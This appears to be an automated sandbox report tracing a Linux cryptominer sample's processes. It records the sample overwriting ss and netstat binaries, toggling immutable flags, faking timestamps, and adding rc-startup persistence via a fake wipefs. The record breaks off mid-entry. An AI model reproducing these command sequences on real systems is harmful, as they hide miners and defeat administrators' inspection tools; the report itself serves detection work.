MD5 hash:	a83f5f379d810462d528dc460d63a04b

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 6273 Parent PID: 5488

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: uname PID: 6273 Parent PID: 5488

General

Start time:	15:22:10
Start date:	31/05/2018
Path:	/bin/uname
Arguments:	uname -r
File size:	33080 bytes
MD5 hash:	81136bf3b923238a5420a003d585a68f

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5473 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5480 Parent PID: 5473

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5480 Parent PID: 5473

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5489 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5489 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5499 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5509 Parent PID: 5499

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5509 Parent PID: 5499

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5522 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5522 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5530 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5541 Parent PID: 5530

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5541 Parent PID: 5530

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5550 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5550 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5559 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5568 Parent PID: 5559

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: chattr PID: 5568 Parent PID: 5559

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/chattr
Arguments:	chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc*.d/S01acpidtd /sbin/ss /sbin/scss /bin/netstat /bin/scnetstat
File size:	11544 bytes
MD5 hash:	429aabf876ae1d2fa2459219366d273c

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5585 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5595 Parent PID: 5585

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: chmod PID: 5595 Parent PID: 5585

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/chmod
Arguments:	chmod +x /sbin/scss
File size:	58584 bytes
MD5 hash:	7c556d30bb69995e4844f5e319e8c303

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5607 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5615 Parent PID: 5607

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: cp PID: 5615 Parent PID: 5607

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/cp
Arguments:	cp -f /tmp/tmpnam_KEKnmE /sbin/ss
File size:	155168 bytes
MD5 hash:	afc7c3ab2546d6d8a98854dcaaa731b3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5641 Parent PID: 5607

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: touch PID: 5641 Parent PID: 5607

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/touch
Arguments:	touch -r /bin/sh /sbin/ss /sbin/scss
File size:	62488 bytes
MD5 hash:	985a951b1a7a8dbe51973e651a365900

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5649 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5658 Parent PID: 5649

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5658 Parent PID: 5649

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5666 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5666 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5675 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5678 Parent PID: 5675

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5678 Parent PID: 5675

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5688 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5688 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5693 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5703 Parent PID: 5693

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: chattr PID: 5703 Parent PID: 5693

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/chattr
Arguments:	chattr +i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd /etc/rc.d/rc1.d/S01acpidtd /etc/rc.d/rc2.d/S01acpidtd /etc/rc.d/rc3.d/S01acpidtd /etc/rc.d/rc4.d/S01acpidtd /etc/rc.d/rc5.d/S01acpidtd /etc/rc.d/rc6.d/S01acpidtd /sbin/ss /sbin/scss /bin/netstat /bin/scnetstat
File size:	11544 bytes
MD5 hash:	429aabf876ae1d2fa2459219366d273c

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5712 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5721 Parent PID: 5712

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5721 Parent PID: 5712

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5729 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5729 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5747 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5755 Parent PID: 5747

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5755 Parent PID: 5747

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5763 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5763 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5772 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5780 Parent PID: 5772

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5780 Parent PID: 5772

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5789 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5789 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5797 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5805 Parent PID: 5797

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: chattr PID: 5805 Parent PID: 5797

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/chattr
Arguments:	chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd /etc/rc.d/rc1.d/S01acpidtd /etc/rc.d/rc2.d/S01acpidtd /etc/rc.d/rc3.d/S01acpidtd /etc/rc.d/rc4.d/S01acpidtd /etc/rc.d/rc5.d/S01acpidtd /etc/rc.d/rc6.d/S01acpidtd /sbin/ss /sbin/scss /bin/netstat /bin/scnetstat
File size:	11544 bytes
MD5 hash:	429aabf876ae1d2fa2459219366d273c

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5818 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5827 Parent PID: 5818

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: chmod PID: 5827 Parent PID: 5818

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/chmod
Arguments:	chmod +x /bin/scnetstat
File size:	58584 bytes
MD5 hash:	7c556d30bb69995e4844f5e319e8c303

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5837 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5845 Parent PID: 5837

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: cp PID: 5845 Parent PID: 5837

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/cp
Arguments:	cp -f /tmp/tmpnam_KEKnmE /bin/netstat
File size:	155168 bytes
MD5 hash:	afc7c3ab2546d6d8a98854dcaaa731b3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5854 Parent PID: 5837

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: touch PID: 5854 Parent PID: 5837

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/touch
Arguments:	touch -r /bin/sh /bin/netstat /bin/scnetstat
File size:	62488 bytes
MD5 hash:	985a951b1a7a8dbe51973e651a365900

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5862 Parent PID: 5465

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5870 Parent PID: 5862

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5870 Parent PID: 5862

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5877 Parent PID: 5465

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5877 Parent PID: 5465

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which ss
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5884 Parent PID: 5465

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5891 Parent PID: 5884

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5891 Parent PID: 5884

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5898 Parent PID: 5465

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: which PID: 5898 Parent PID: 5465

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/bin/which
Arguments:	which netstat
File size:	24336 bytes
MD5 hash:	8fb996e3ef12e5c65a3f47efca700ec3

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5909 Parent PID: 5465

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: tmpnam_KEKnmE PID: 5918 Parent PID: 5909

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/tmp/tmpnam_KEKnmE
Arguments:	n/a
File size:	1223753 bytes
MD5 hash:	eafef5b086d1e5940ab27a617e48b7c4

Chronological Activities

Analysis Process: chattr PID: 5918 Parent PID: 5909

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/bin/chattr
Arguments:	chattr +i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc0.d/S01acpidtd /etc/rc.d/rc1.d/S01acpidtd /etc/rc.d/rc2.d/S01acpidtd /etc/rc.d/rc3.d/S01acpidtd /etc/rc.d/rc4.d/S01acpidtd /etc/rc.d/rc5.d/S01acpidtd /etc/rc.d/rc6.d/S01acpidtd /sbin/ss /sbin/scss /bin/netstat /bin/scnetstat
File size:	11544 bytes
MD5 hash:	429aabf876ae1d2fa2459219366d273c

Chronological Activities

Analysis Process: sh PID: 5925 Parent PID: 5461

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: rm PID: 5925 Parent PID: 5461

General

Start time:	15:20:08
Start date:	31/05/2018
Path:	/bin/rm
Arguments:	rm /tmp/tmpnam_KEKnmE
File size:	62864 bytes
MD5 hash:	a53cece4b9a67959e2143873e47a9cc5

Chronological Activities

Analysis Process: coinminer PID: 5455 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/tmp/coinminer
Arguments:	n/a
File size:	2384177 bytes
MD5 hash:	9a0629bbb97ef2c2fd8369778aa9a0d3

Chronological Activities

Analysis Process: sh PID: 5455 Parent PID: 5451

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	sh -c "cp -f /tmp/coinminer /bin/wipefs>/dev/null 2>&1\nln -fs /bin/wipefs /etc/init.d/wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc0.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc1.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc2.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc3.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc4.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipefs /etc/rc5.d/S01wipefs>/dev/null 2>&1\nln -fs /etc/init.d/wipef"
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: sh PID: 5458 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: cp PID: 5458 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/cp
Arguments:	cp -f /tmp/coinminer /bin/wipefs
File size:	155168 bytes
MD5 hash:	afc7c3ab2546d6d8a98854dcaaa731b3

Chronological Activities

Analysis Process: sh PID: 5471 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5471 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /bin/wipefs /etc/init.d/wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5481 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5481 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc0.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5490 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5490 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc1.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5498 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5498 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc2.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5507 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5507 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc3.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5520 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5520 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc4.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5529 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5529 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc5.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5538 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	df0d31d6acbb7862916223a26cc45da0

Chronological Activities

Analysis Process: ln PID: 5538 Parent PID: 5455

General

Start time:	15:20:07
Start date:	31/05/2018
Path:	/bin/ln
Arguments:	ln -fs /etc/init.d/wipefs /etc/rc6.d/S01wipefs
File size:	58608 bytes
MD5 hash:	1b38975800862fdf2d2c8165ed30690b

Chronological Activities

Analysis Process: sh PID: 5546 Parent PID: 5455

General

Start time:	15:20:07
